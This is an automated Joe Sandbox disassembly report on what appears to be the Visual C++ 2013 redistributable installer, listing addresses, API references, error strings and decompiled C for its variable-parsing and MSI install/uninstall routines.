0x0128a136
0x0128a13c
0x0128a148
0x0128a155
0x0128a159
0x00000000
0x00000000
0x0128a170
0x0128a174
0x0128a3a7
0x00000000
0x0128a17a
0x0128a18b
0x0128a18f
0x0128a3ae
0x00000000
0x0128a195
0x0128a1a6
0x0128a1aa
0x0128a3b5
0x00000000
0x0128a1b0
0x0128a1c1
0x0128a1c9
0x0128a2a5
0x00000000
0x0128a1cf
0x0128a1d1
0x0128a3bc
0x00000000
0x0128a1d7
0x0128a1e4
0x0128a1e8
0x0128a3c3
0x00000000
0x0128a1ee
0x0128a1ff
0x0128a203
0x0128a3ca
0x00000000
0x0128a209
0x0128a209
0x0128a21e
0x0128a250
0x0128a281
0x0128a372
0x0128a375
0x0128a37a
0x00000000
0x0128a287
0x0128a28a
0x0128a28c
0x0128a298
0x0128a29d
0x0128a29d
0x0128a2a0
0x00000000
0x0128a2a0
0x0128a252
0x0128a255
0x0128a257
0x0128a263
0x0128a268
0x0128a268
0x0128a26b
0x0128a2a2
0x0128a2a2
0x00000000
0x0128a2a2
0x0128a220
0x0128a223
0x0128a225
0x0128a231
0x0128a236
0x0128a236
0x0128a23b
0x0128a2a7
0x0128a2aa
0x0128a2b6
0x0128a2bb
0x0128a2bb
0x0128a2c8
0x0128a2cc
0x0128a3d1
0x00000000
0x0128a2d2
0x0128a2e1
0x0128a2e5
0x0128a3e0
0x0128a3e3
0x00000000
0x0128a2eb
0x0128a2eb
0x0128a2ee
0x0128a2f4
0x0128a310
0x0128a317
0x0128a381
0x0128a391
0x0128a396
0x0128a399
0x00000000
0x00000000
0x00000000
0x00000000
0x0128a2f6
0x0128a2fe
0x0128a302
0x0128a3ea
0x0128a3ed
0x00000000
0x0128a308
0x0128a308
0x0128a319
0x0128a31f
0x0128a325
0x0128a329
0x0128a32f
0x0128a333
0x0128a344
0x0128a348
0x0128a3f4
0x0128a3f7
0x0128a3fc
0x0128a3fc
0x0128a3fd
0x0128a34e
0x0128a34e
0x0128a353
0x0128a355
0x0128a358
0x0128a35b
0x0128a35b
0x0128a35e
0x0128a367
0x00000000
0x00000000
0x0128a36d
0x0128a367
0x0128a348
0x0128a302
0x0128a2f4
0x0128a2e5
0x0128a2cc
0x0128a21e
0x0128a203
0x0128a1e8
0x0128a1d1
0x0128a1c9
0x0128a1aa
0x0128a18f
0x00000000
0x0128a174
0x0128a3a0
0x00000000
0x0128a3a0
0x0128a12c
0x0128a12c
0x00000000
0x0128a12c
0x0128a10f
0x0128a10f
0x0128a3d6
0x0128a3d6
0x0128a3d7
0x0128a3dd
0x0128a405
0x0128a408
0x0128a40e
0x0128a413
0x0128a418
0x0128a418
0x0128a41b
0x0128a420
0x0128a425
0x0128a425
0x0128a42b
0x0128a430
0x0128a430
0x0128a438
0x0128a43d
0x0128a43d
0x0128a446
0x0128a451

APIs

EnterCriticalSection.KERNEL32(?,00000000,?,80070490,?,?,?,?,?,?,?,?,012A3A1D,?,?,?), ref: 0128A0F2
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,012A3A1D,?,?,?,?,?,Chain), ref: 0128A408

Strings

numeric, xrefs: 0128A20D
Initializing version variable '%ls' to value '%ls', xrefs: 0128A292
Failed to get @Value., xrefs: 0128A3BC
Type, xrefs: 0128A1F2
Failed to get variable node count., xrefs: 0128A12C
Attempt to set built-in variable value: %ls, xrefs: 0128A399
Failed to get @Hidden., xrefs: 0128A3AE
Initializing numeric variable '%ls' to value '%ls', xrefs: 0128A22B
Failed to change variant type., xrefs: 0128A3D1
Hidden, xrefs: 0128A17E
Persisted, xrefs: 0128A199
variable.cpp, xrefs: 0128A38C
Failed to insert variable '%ls'., xrefs: 0128A3ED
version, xrefs: 0128A270
Variable, xrefs: 0128A0FC
Failed to get next node., xrefs: 0128A3A0
Failed to select variable nodes., xrefs: 0128A10F
Invalid value for @Type: %ls, xrefs: 0128A37A
Initializing string variable '%ls' to value '%ls', xrefs: 0128A25D
Value, xrefs: 0128A1B4
string, xrefs: 0128A23F
Failed to get @Type., xrefs: 0128A3CA
Failed to set value of variable: %ls, xrefs: 0128A3F7
Failed to find variable value '%ls'., xrefs: 0128A3E3
Failed to set variant value., xrefs: 0128A3C3
Failed to get @Id., xrefs: 0128A3A7
Failed to get @Persisted., xrefs: 0128A3B5
Initializing hidden variable '%ls', xrefs: 0128A2AF

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: Attempt to set built-in variable value: %ls$Failed to change variant type.$Failed to find variable value '%ls'.$Failed to get @Hidden.$Failed to get @Id.$Failed to get @Persisted.$Failed to get @Type.$Failed to get @Value.$Failed to get next node.$Failed to get variable node count.$Failed to insert variable '%ls'.$Failed to select variable nodes.$Failed to set value of variable: %ls$Failed to set variant value.$Hidden$Initializing hidden variable '%ls'$Initializing numeric variable '%ls' to value '%ls'$Initializing string variable '%ls' to value '%ls'$Initializing version variable '%ls' to value '%ls'$Invalid value for @Type: %ls$Persisted$Type$Value$Variable$numeric$string$variable.cpp$version
API String ID: 3168844106-1657652604
Opcode ID: f32021b62343a2097e8d4543d2dad799e44d97140fe606e97f9461e4ee6d8f3f
Instruction ID: c94db364ea650f8f90ed83810d3dea3394241fa7e74739007f6e134f7623ab6d
Opcode Fuzzy Hash: f32021b62343a2097e8d4543d2dad799e44d97140fe606e97f9461e4ee6d8f3f
Instruction Fuzzy Hash: 9EA18D71D7112AFBCF20BF94CD85CEEBB79EB04340B04416AFA11B7191DBB15A418B91

Uniqueness

Uniqueness Score: -1.00%

Function 0128A947 Relevance: 54.6, APIs: 12, Strings: 19, Instructions: 398
stringCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 64%

			E0128A947(void* __edx, struct _CRITICAL_SECTION* _a4, WCHAR* _a8, signed int _a12, signed int _a16, signed int _a20) {
				signed int _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				void* __edi;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t104;
				signed int _t105;
				short* _t113;
				signed int _t114;
				signed int _t120;
				signed int _t124;
				signed int _t129;
				signed int _t131;
				void* _t143;
				signed int _t144;
				signed int _t157;
				signed int _t158;
				signed int _t159;
				intOrPtr* _t160;
				void* _t163;
				signed int _t168;
				void* _t170;
				signed int _t171;
				signed int _t172;
				signed int _t175;
				void* _t176;
				signed int _t178;
				short* _t180;
				signed int _t181;
				void* _t184;

				_t170 = __edx;
				_t157 = 0;
				_v24 = 0;
				_v12 = 0;
				_v20 = 0;
				_v8 = 0;
				_v16 = 0;
				_v32 = 0;
				_v28 = 0;
				EnterCriticalSection(_a4);
				if(E012B00D8( &_v24, lstrlenW(_a8) + 1) >= 0) {
					_t180 = _a8;
					_t171 = E012A8671(_t180, 0x5b);
					_pop(_t163);
					__eflags = _t171;
					if(_t171 == 0) {
						L31:
						_t94 = E012B1325(_t163,  &_v24, _t180, _t157);
						_t181 = _t94;
						__eflags = _t181 - _t157;
						if(_t181 >= _t157) {
							L34:
							_push(_v8);
							L012AF036();
							_t158 = _t94;
							_t172 = 0;
							_v28 = _t158;
							__eflags = _t158;
							if(_t158 != 0) {
								_push(_v24);
								_push(0);
								_push(_t158);
								L012AF030();
								__eflags = _t94;
								if(__eflags == 0) {
									__eflags = _v8;
									if(_v8 <= 0) {
										L46:
										_v16 = _v16 & 0x00000000;
										_t95 =  &_v16;
										_push(_t95);
										_push(0x12ba5c8);
										_push(_t158);
										_push(0);
										L012AF02A();
										__eflags = _t95 - 0xea;
										if(_t95 == 0xea) {
											L58:
											__eflags = _a12;
											if(_a12 == 0) {
												L69:
												_t96 = _a16;
												__eflags = _t96;
												if(_t96 != 0) {
													 *_t96 = _v16;
												}
												L79:
												LeaveCriticalSection(_a4);
												_t159 = _v20;
												if(_t159 == 0) {
													L85:
													if(_v28 != 0) {
														_push(_v28);
														L012AF024();
													}
													if(_v24 != 0) {
														E012B01E8(_v24);
													}
													if(_v12 != 0) {
														E012B01E8(_v12);
													}
													return _t181;
												}
												_t175 = 0;
												if(_v8 <= 0) {
													L84:
													E012B24F6(_t159);
													goto L85;
												} else {
													goto L81;
												}
												do {
													L81:
													_t101 =  *((intOrPtr*)(_t159 + _t175 * 4));
													if( *((intOrPtr*)(_t159 + _t175 * 4)) != 0) {
														E012B01E8(_t101);
													}
													_t175 = _t175 + 1;
												} while (_t175 < _v8);
												goto L84;
											}
											_v16 = _v16 + 1;
											_t104 = E012B00D8( &_v12, _v16);
											__eflags = _t104;
											if(_t104 >= 0) {
												_t105 =  &_v16;
												_push(_t105);
												_push(_v12);
												_push(_t158);
												_push(0);
												L012AF02A();
												__eflags = _t105;
												if(__eflags == 0) {
													_t181 = E012B1171(_t163, _t170, _a12, _v12, 0);
													__eflags = _t181;
													if(_t181 >= 0) {
														goto L69;
													}
													_push("Failed to copy string.");
													L78:
													_push(_t181);
													E012AFA86();
													goto L79;
												}
												if(__eflags > 0) {
													_t105 = _t105 & 0x0000ffff | 0x80070000;
													__eflags = _t105;
												}
												_t181 = _t105;
												__eflags = _t181;
												if(_t181 >= 0) {
													_t181 = 0x80004005;
												}
												E012B294E(_t105, "variable.cpp", 0x43b, _t181);
												_push("Failed to format record.");
												goto L78;
											}
											_push("Failed to allocate string.");
											goto L78;
										}
										__eflags = _t95;
										if(__eflags == 0) {
											goto L58;
										}
										if(__eflags > 0) {
											_t95 = _t95 & 0x0000ffff | 0x80070000;
											__eflags = _t95;
										}
										_t181 = _t95;
										__eflags = _t181;
										if(_t181 >= 0) {
											_t181 = 0x80004005;
										}
										E012B294E(_t95, "variable.cpp", 0x431, _t181);
										_push("Failed to get formatted length.");
										goto L78;
									} else {
										goto L43;
									}
									do {
										L43:
										_t113 =  *((intOrPtr*)(_v20 + _t172 * 4));
										__eflags =  *_t113;
										if( *_t113 == 0) {
											goto L45;
										}
										_push(_t113);
										_t59 = _t172 + 1; // 0x1
										_t114 = _t59;
										_push(_t114);
										_push(_t158);
										L012AF030();
										__eflags = _t114;
										if(__eflags != 0) {
											if(__eflags > 0) {
												_t114 = _t114 & 0x0000ffff | 0x80070000;
												__eflags = _t114;
											}
											_t181 = _t114;
											__eflags = _t181;
											if(_t181 >= 0) {
												_t181 = 0x80004005;
											}
											E012B294E(_t114, "variable.cpp", 0x425, _t181);
											_push("Failed to set record string.");
											goto L78;
										}
										L45:
										_t172 = _t172 + 1;
										__eflags = _t172 - _v8;
									} while (_t172 < _v8);
									goto L46;
								}
								if(__eflags > 0) {
									_t94 = _t94 & 0x0000ffff | 0x80070000;
									__eflags = _t94;
								}
								_t181 = _t94;
								__eflags = _t181 - _t172;
								if(_t181 >= _t172) {
									_t181 = 0x80004005;
								}
								E012B294E(_t94, "variable.cpp", 0x41d, _t181);
								_push("Failed to set record format string.");
								goto L78;
							}
							_t181 = 0x8007000e;
							E012B294E(_t94, "variable.cpp", 0x419, 0x8007000e);
							_push("Failed to allocate record.");
							goto L78;
						}
						L32:
						_push("Failed to append string.");
						goto L78;
					} else {
						goto L3;
					}
					while(1) {
						L3:
						_t12 = _t171 + 2; // 0x2
						_t160 = _t12;
						_t120 = E012A8671(_t160, 0x5d);
						_pop(_t163);
						_a8 = _t120;
						__eflags = _t120;
						if(_t120 == 0) {
							break;
						}
						_t124 = (_t120 - _t171 >> 1) - 1;
						__eflags = _t124;
						_v16 = _t124;
						if(_t124 != 0) {
							__eflags = _t171 - _t180;
							if(_t171 <= _t180) {
								L10:
								_t181 = E012B1171(_t163, _t170,  &_v12, _t160, _t124);
								__eflags = _t181;
								if(_t181 < 0) {
									_push("Failed to get variable name.");
									goto L78;
								}
								__eflags = _v20;
								_push(1);
								_push(4 + _v8 * 4);
								if(_v20 == 0) {
									_t129 = E012B233B();
									_v20 = _t129;
									__eflags = _t129;
									if(_t129 == 0) {
										_t181 = 0x8007000e;
										E012B294E(_t129, "variable.cpp", 0x3e9, 0x8007000e);
										_push("Failed to allocate variable array.");
										goto L78;
									}
									L15:
									__eflags = _v16 - 2;
									if(_v16 < 2) {
										L19:
										__eflags = _a20;
										if(_a20 == 0) {
											L21:
											_t131 = _v20;
											_t168 = _v8;
											__eflags = _v32;
											if(_v32 == 0) {
												_t176 = _t131 + _t168 * 4;
												_t181 = E0128A63B(_t168, _t170, _a4, _v12, _t176);
												__eflags = _t181 - 0x80070490;
												if(_t181 != 0x80070490) {
													L26:
													__eflags = _t181;
													if(_t181 < 0) {
														_push("Failed to set variable value.");
														goto L78;
													}
													_v8 = _v8 + 1;
													_t181 = E012B177A( &_v12, L"[%d]", _v8);
													_t184 = _t184 + 0xc;
													__eflags = _t181;
													if(_t181 < 0) {
														_push("Failed to format placeholder string.");
														goto L78;
													}
													_t181 = E012B1325(_t168,  &_v24, _v12, 0);
													__eflags = _t181;
													if(_t181 < 0) {
														_push("Failed to append placeholder.");
														goto L78;
													}
													L29:
													_t180 =  &(_a8[1]);
													_t171 = E012A8671(_t180, 0x5b);
													_pop(_t163);
													__eflags = _t171;
													if(_t171 != 0) {
														continue;
													}
													_t157 = 0;
													__eflags = 0;
													goto L31;
												}
												_push(0);
												_push(0x12ba5c8);
												_push(_t176);
												L25:
												_t181 = E012B1171(_t168, _t170);
												goto L26;
											}
											_push(0);
											_push(L"*****");
											L18:
											_push(_t131 + _t168 * 4);
											goto L25;
										}
										_t181 = E0128A066(_a4, _t163,  &_v32, _v12);
										__eflags = _t181;
										if(_t181 < 0) {
											E012AFA86(_t181, "Failed to determine variable visibility: \'%ls\'.", _v12);
											goto L79;
										}
										goto L21;
									}
									_t143 = 0x5c;
									__eflags = _t143 -  *_t160;
									if(_t143 !=  *_t160) {
										goto L19;
									}
									_t131 = _v20;
									_t168 = _v8;
									_push(1);
									_t178 = _t171 + 4;
									__eflags = _t178;
									_push(_t178);
									goto L18;
								}
								_push(_v20);
								_t144 = E012B235D();
								__eflags = _t144;
								if(_t144 == 0) {
									_t181 = 0x8007000e;
									E012B294E(_t144, "variable.cpp", 0x3e3, 0x8007000e);
									_push("Failed to reallocate variable array.");
									goto L78;
								}
								_v20 = _t144;
								goto L15;
							}
							_t181 = E012B1325(_t163,  &_v24, _t180, _t171 - _t180 >> 1);
							__eflags = _t181;
							if(_t181 < 0) {
								goto L32;
							}
							_t124 = _v16;
							goto L10;
						}
						_t181 = E012B1325(_t163,  &_v24, _t180, (_a8 - _t180 >> 1) + 1);
						__eflags = _t181;
						if(_t181 < 0) {
							goto L32;
						}
						goto L29;
					}
					_t94 = E012B1325(_t163,  &_v24, _t180, 0);
					_t181 = _t94;
					__eflags = _t181;
					if(_t181 < 0) {
						goto L32;
					}
					goto L34;
				}
				_push("Failed to allocate buffer for format string.");
				goto L78;
			}

0x0128a947
0x0128a94f
0x0128a955
0x0128a958
0x0128a95b
0x0128a95e
0x0128a961
0x0128a964
0x0128a967
0x0128a96a
0x0128a988
0x0128a994
0x0128a99f
0x0128a9a2
0x0128a9a3
0x0128a9a5
0x0128ab35
0x0128ab3b
0x0128ab40
0x0128ab42
0x0128ab44
0x0128ab62
0x0128ab62
0x0128ab65
0x0128ab6a
0x0128ab6c
0x0128ab6e
0x0128ab71
0x0128ab73
0x0128ab94
0x0128ab97
0x0128ab98
0x0128ab99
0x0128ab9e
0x0128aba0
0x0128abd3
0x0128abd6
0x0128abf9
0x0128abf9
0x0128abfd
0x0128ac00
0x0128ac01
0x0128ac06
0x0128ac07
0x0128ac09
0x0128ac0e
0x0128ac13
0x0128ac7b
0x0128ac7d
0x0128ac80
0x0128acfd
0x0128acfd
0x0128ad00
0x0128ad02
0x0128ad07
0x0128ad07
0x0128ad78
0x0128ad7b
0x0128ad81
0x0128ad86
0x0128ada8
0x0128adad
0x0128adaf
0x0128adb2
0x0128adb2
0x0128adba
0x0128adbf
0x0128adbf
0x0128adc7
0x0128adcc
0x0128adcc
0x0128add7
0x0128add7
0x0128ad88
0x0128ad8d
0x0128ada2
0x0128ada3
0x00000000
0x00000000
0x00000000
0x00000000
0x0128ad8f
0x0128ad8f
0x0128ad8f
0x0128ad94
0x0128ad97
0x0128ad97
0x0128ad9c
0x0128ad9d
0x00000000
0x0128ad8f
0x0128ac82
0x0128ac8c
0x0128ac93
0x0128ac95
0x0128aca1
0x0128aca4
0x0128aca5
0x0128aca8
0x0128aca9
0x0128acaa
0x0128acaf
0x0128acb1
0x0128acf0
0x0128acf2
0x0128acf4
0x00000000
0x00000000
0x0128acf6
0x0128ad70
0x0128ad70
0x0128ad71
0x00000000
0x0128ad77
0x0128acb3
0x0128acba
0x0128acba
0x0128acba
0x0128acbf
0x0128acc1
0x0128acc3
0x0128acc5
0x0128acc5
0x0128acd5
0x0128acda
0x00000000
0x0128acda
0x0128ac97
0x00000000
0x0128ac97
0x0128ac15
0x0128ac17
0x00000000
0x00000000
0x0128ac19
0x0128ac20
0x0128ac20
0x0128ac20
0x0128ac25
0x0128ac27
0x0128ac29
0x0128ac2b
0x0128ac2b
0x0128ac3b
0x0128ac40
0x00000000
0x00000000
0x00000000
0x00000000
0x0128abd8
0x0128abd8
0x0128abdb
0x0128abde
0x0128abe2
0x00000000
0x00000000
0x0128abe4
0x0128abe5
0x0128abe5
0x0128abe8
0x0128abe9
0x0128abea
0x0128abef
0x0128abf1
0x0128ac4a
0x0128ac51
0x0128ac51
0x0128ac51
0x0128ac56
0x0128ac58
0x0128ac5a
0x0128ac5c
0x0128ac5c
0x0128ac6c
0x0128ac71
0x00000000
0x0128ac71
0x0128abf3
0x0128abf3
0x0128abf4
0x0128abf4
0x00000000
0x0128abd8
0x0128aba2
0x0128aba9
0x0128aba9
0x0128aba9
0x0128abae
0x0128abb0
0x0128abb2
0x0128abb4
0x0128abb4
0x0128abc4
0x0128abc9
0x00000000
0x0128abc9
0x0128ab75
0x0128ab85
0x0128ab8a
0x00000000
0x0128ab8a
0x0128ab46
0x0128ab46
0x00000000
0x00000000
0x00000000
0x00000000
0x0128a9ab
0x0128a9ab
0x0128a9ab
0x0128a9ab
0x0128a9b1
0x0128a9b7
0x0128a9b8
0x0128a9bb
0x0128a9bd
0x00000000
0x00000000
0x0128a9c7
0x0128a9c7
0x0128a9c8
0x0128a9cb
0x0128a9ef
0x0128a9f1
0x0128aa11
0x0128aa1c
0x0128aa1e
0x0128aa20
0x0128ad0b
0x00000000
0x0128ad0b
0x0128aa26
0x0128aa2d
0x0128aa36
0x0128aa37
0x0128aa4e
0x0128aa53
0x0128aa56
0x0128aa58
0x0128ad2e
0x0128ad3e
0x0128ad43
0x00000000
0x0128ad43
0x0128aa5e
0x0128aa5e
0x0128aa62
0x0128aa7e
0x0128aa7e
0x0128aa82
0x0128aa9c
0x0128aa9c
0x0128aa9f
0x0128aaa4
0x0128aaa7
0x0128aab1
0x0128aac0
0x0128aac2
0x0128aac8
0x0128aad8
0x0128aad8
0x0128aada
0x0128ad5d
0x00000000
0x0128ad5d
0x0128aae0
0x0128aaf4
0x0128aaf6
0x0128aaf9
0x0128aafb
0x0128ad64
0x00000000
0x0128ad64
0x0128ab0f
0x0128ab11
0x0128ab13
0x0128ad6b
0x00000000
0x0128ad6b
0x0128ab19
0x0128ab1c
0x0128ab27
0x0128ab2a
0x0128ab2b
0x0128ab2d
0x00000000
0x00000000
0x0128ab33
0x0128ab33
0x00000000
0x0128ab33
0x0128aaca
0x0128aacb
0x0128aad0
0x0128aad1
0x0128aad6
0x00000000
0x0128aad6
0x0128aaa9
0x0128aaaa
0x0128aa78
0x0128aa7b
0x00000000
0x0128aa7b
0x0128aa92
0x0128aa94
0x0128aa96
0x0128ad53
0x00000000
0x0128ad58
0x00000000
0x0128aa96
0x0128aa66
0x0128aa67
0x0128aa6a
0x00000000
0x00000000
0x0128aa6c
0x0128aa6f
0x0128aa72
0x0128aa74
0x0128aa74
0x0128aa77
0x00000000
0x0128aa77
0x0128aa39
0x0128aa3c
0x0128aa41
0x0128aa43
0x0128ad12
0x0128ad22
0x0128ad27
0x00000000
0x0128ad27
0x0128aa49
0x00000000
0x0128aa49
0x0128aa04
0x0128aa06
0x0128aa08
0x00000000
0x00000000
0x0128aa0e
0x00000000
0x0128aa0e
0x0128a9e0
0x0128a9e2
0x0128a9e4
0x00000000
0x00000000
0x00000000
0x0128a9ea
0x0128ab57
0x0128ab5c
0x0128ab5e
0x0128ab60
0x00000000
0x00000000
0x00000000
0x0128ab60
0x0128a98a
0x00000000

APIs

EnterCriticalSection.KERNEL32(?,?,?,00000000,00000000,?,01288B89,?,?,?,?,?,?,?,?,00000001), ref: 0128A96A
lstrlenW.KERNEL32(?,?,01288B89,?,?,?,?,?,?,?,?,00000001,00000000), ref: 0128A973
_wcschr.LIBCMT ref: 0128A99A
_wcschr.LIBCMT ref: 0128A9B1
_wcschr.LIBCMT ref: 0128AB22
LeaveCriticalSection.KERNEL32(?,00000000,00000000,012BA5C8,00000000,00000000,00000000,01288B89,?,01288B89,?,00000000,01288B89,00000001,?,01288B89), ref: 0128AD7B
#8.MSI(?,?,01288B89,?), ref: 0128ADB2

Strings

Failed to format record., xrefs: 0128ACDA
Failed to set record format string., xrefs: 0128ABC9
Failed to allocate string., xrefs: 0128AC97
Failed to allocate buffer for format string., xrefs: 0128A98A
variable.cpp, xrefs: 0128AB80, 0128ABBF, 0128AC36, 0128AC67, 0128ACD0, 0128AD1D, 0128AD39
Failed to format placeholder string., xrefs: 0128AD64
[%d], xrefs: 0128AAE9
Failed to append placeholder., xrefs: 0128AD6B
Failed to allocate record., xrefs: 0128AB8A
Failed to reallocate variable array., xrefs: 0128AD27
*****, xrefs: 0128AAAA
Failed to determine variable visibility: '%ls'., xrefs: 0128AD4D
Failed to get variable name., xrefs: 0128AD0B
Failed to allocate variable array., xrefs: 0128AD43
Failed to append string., xrefs: 0128AB46
Failed to set record string., xrefs: 0128AC71
Failed to set variable value., xrefs: 0128AD5D
Failed to get formatted length., xrefs: 0128AC40
Failed to copy string., xrefs: 0128ACF6

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: _wcschr$CriticalSection$EnterLeavelstrlen
String ID: *****$Failed to allocate buffer for format string.$Failed to allocate record.$Failed to allocate string.$Failed to allocate variable array.$Failed to append placeholder.$Failed to append string.$Failed to copy string.$Failed to determine variable visibility: '%ls'.$Failed to format placeholder string.$Failed to format record.$Failed to get formatted length.$Failed to get variable name.$Failed to reallocate variable array.$Failed to set record format string.$Failed to set record string.$Failed to set variable value.$[%d]$variable.cpp
API String ID: 144789458-2050445661
Opcode ID: 100fa89b5e462f54357767f2283efbe5f4e6b6444f3f7873d315a0e45c8c4577
Instruction ID: 9f736e40bb5238b8ea3613b86526aa6150848824495bf416cfaa900e19b52440
Opcode Fuzzy Hash: 100fa89b5e462f54357767f2283efbe5f4e6b6444f3f7873d315a0e45c8c4577
Instruction Fuzzy Hash: FFC11A72D7261BFBDB21BE988D81AFE7A75AF10751F154126EB00F71C0EE749A408790

Uniqueness

Uniqueness Score: -1.00%

Function 0129CC4F Relevance: 53.0, APIs: 1, Strings: 29, Instructions: 465
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E0129CC4F(char* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr* _a28) {
				signed int _v8;
				char _v1584;
				char* _v1588;
				char _v1592;
				char* _v1596;
				char _v1600;
				char _v1604;
				intOrPtr _v1608;
				char _v1612;
				void* _v1616;
				intOrPtr _v1620;
				intOrPtr _v1624;
				intOrPtr _v1628;
				intOrPtr _v1632;
				intOrPtr _v1636;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t144;
				char* _t154;
				char* _t155;
				char* _t157;
				char* _t159;
				char* _t161;
				char* _t163;
				char* _t165;
				char* _t167;
				char* _t168;
				char* _t174;
				intOrPtr _t183;
				void* _t187;
				char* _t201;
				char* _t207;
				char* _t210;
				char* _t211;
				intOrPtr _t218;
				char* _t219;
				char* _t220;
				intOrPtr _t221;
				intOrPtr _t241;
				char* _t243;
				intOrPtr _t250;
				char* _t260;
				intOrPtr _t263;
				char* _t268;
				char* _t278;
				intOrPtr _t280;
				signed int _t281;

				_t278 = __edx;
				_t144 =  *0x12d40d0; // 0xaab4e29e
				_v8 = _t144 ^ _t281;
				_v1628 = _a4;
				_v1620 = _a12;
				_t250 = _a16;
				_t280 = _a8;
				_v1632 = _a20;
				_v1636 = _a24;
				_v1616 = _a28;
				_v1608 = _t250;
				E012A7E30( &_v1584, 0, 0x628);
				_v1600 = 0;
				_v1604 = 0;
				_v1612 = 0;
				_v1592 = 0;
				_v1588 = 0;
				_v1596 = 0;
				if(_t250 == 0) {
					L8:
					__eflags =  *(_t280 + 0x10) & 0x00000004;
					_v1624 = 0x1fdf;
					if(( *(_t280 + 0x10) & 0x00000004) != 0) {
						_v1624 = 0x3fdf;
					}
					__eflags =  *((intOrPtr*)(_t280 + 0x18)) - 1;
					if( *((intOrPtr*)(_t280 + 0x18)) == 1) {
						L15:
						_t154 = E012B4CFE(_v1632,  *((intOrPtr*)(_t280 + 0x14)), _v1628, _v1636, _v1608,  &_v1584);
						__eflags = _t154;
						if(_t154 >= 0) {
							_t155 =  *(_t280 + 0xc);
							__eflags = _t155;
							if(_t155 == 0) {
								L21:
								_t157 = E0129C569(0,  *((intOrPtr*)( *((intOrPtr*)(_t280 + 8)) + 0xb4)),  *((intOrPtr*)( *((intOrPtr*)(_t280 + 8)) + 0xb8)), _v1620, _v1608,  &_v1588, 0);
								__eflags = _t157;
								if(_t157 >= 0) {
									_t159 = E0129C569(0,  *((intOrPtr*)( *((intOrPtr*)(_t280 + 8)) + 0xb4)),  *((intOrPtr*)( *((intOrPtr*)(_t280 + 8)) + 0xb8)), _v1620, _v1608,  &_v1596, 1);
									_t253 = _t159;
									__eflags = _t159;
									if(_t159 >= 0) {
										_t161 = E0129B278(_t253, 0,  *((intOrPtr*)(_t280 + 8)),  *((intOrPtr*)(_t280 + 0x1c)),  &_v1588);
										_t254 = _t161;
										__eflags = _t161;
										if(_t161 >= 0) {
											_t163 = E0129B278(_t254, 0,  *((intOrPtr*)(_t280 + 8)),  *((intOrPtr*)(_t280 + 0x1c)),  &_v1596);
											__eflags = _t163;
											if(_t163 >= 0) {
												_t165 = E0129B5C2( *((intOrPtr*)(_t280 + 8)), _t278, _t280,  *((intOrPtr*)(_t280 + 0x20)),  &_v1588);
												__eflags = _t165;
												if(_t165 >= 0) {
													_t167 = E0129B5C2( *((intOrPtr*)(_t280 + 8)), _t278, _t280,  *((intOrPtr*)(_t280 + 0x20)),  &_v1596);
													__eflags = _t167;
													if(_t167 >= 0) {
														_t168 = _v1596;
														__eflags = _t168;
														if(_t168 == 0) {
															_t168 = 0x12ba5c8;
														}
														_push(_t168);
														_push(_v1592);
														_push(E012917CA( *((intOrPtr*)(_t280 + 0x18))));
														_push( *((intOrPtr*)( *((intOrPtr*)(_t280 + 8)))));
														E01281566(2, 0x2000012d, E01291B91(_v1608));
														_t263 =  *((intOrPtr*)(_t280 + 0x18));
														_t174 = _t263 - 1;
														__eflags = _t174;
														if(_t174 == 0) {
															_t260 = E012B1325(_t263,  &_v1588, L" REBOOT=ReallySuppress", 0);
															__eflags = _t260;
															if(_t260 >= 0) {
																_push(L"IGNOREDEPENDENCIES");
																_t260 = E012B177A( &_v1588, L"%ls %ls=ALL", _v1588);
																__eflags = _t260;
																if(__eflags < 0) {
																	goto L61;
																}
																_t260 = E012B45C8(__eflags,  *((intOrPtr*)( *((intOrPtr*)(_t280 + 8)) + 0x90)), 0, 2, _v1588,  &_v1600);
																__eflags = _t260 - 0x80070645;
																if(_t260 == 0x80070645) {
																	E01281566(2, 0xa0000133,  *((intOrPtr*)( *((intOrPtr*)(_t280 + 8)))));
																	_t260 = 0;
																	__eflags = 0;
																}
																__eflags = _t260;
																if(_t260 >= 0) {
																	goto L77;
																} else {
																	_push("Failed to uninstall MSI package.");
																	goto L76;
																}
															}
															_push("Failed to add reboot suppression property on uninstall.");
															goto L76;
														} else {
															_t201 = _t174 - 1;
															__eflags = _t201;
															if(_t201 == 0) {
																L42:
																_t260 = E012B1325(_t263,  &_v1588, L" REBOOT=ReallySuppress", 0);
																__eflags = _t260;
																if(__eflags >= 0) {
																	_t260 = E012B461A(__eflags, _v1592, _v1588,  &_v1600);
																	__eflags = _t260;
																	if(_t260 >= 0) {
																		L68:
																		E0129C67D(_t260, _t263, 0, _t280, _v1592);
																		goto L77;
																	}
																	_push("Failed to install MSI package.");
																	goto L76;
																}
																_push("Failed to add reboot suppression property on install.");
																goto L76;
															}
